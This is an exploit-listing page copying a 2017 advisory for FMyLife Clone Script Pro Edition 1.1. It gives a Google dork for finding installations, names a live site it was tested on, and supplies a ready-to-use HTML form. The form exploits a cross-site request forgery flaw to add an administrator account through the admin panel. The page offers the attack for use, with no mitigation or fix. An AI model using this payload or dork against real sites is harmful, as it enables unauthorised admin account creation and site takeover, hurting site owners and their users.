Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017010058

Below is a copy:

FMyLife Clone Script Pro Edition 1.1 Cross Site Request Forgery# # # # # 
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Tested on: http://www.tellaboutit.com/admin/
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/   
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
 <div id="add-admin-form">
  <input type="hidden" name="action" value="add-admin" />
  <label for="username">Username:</label>
  <input type="text" id="username" name="admin-username" value="" />
  <div class="spacer"></div>
  <label for="password">Password:</label>
  <input type="password" id="password" name="admin-password" value="" />
  <div class="spacer"></div>
  <input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
 </div>
</form>
</body>
</html>
# # # # #


Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.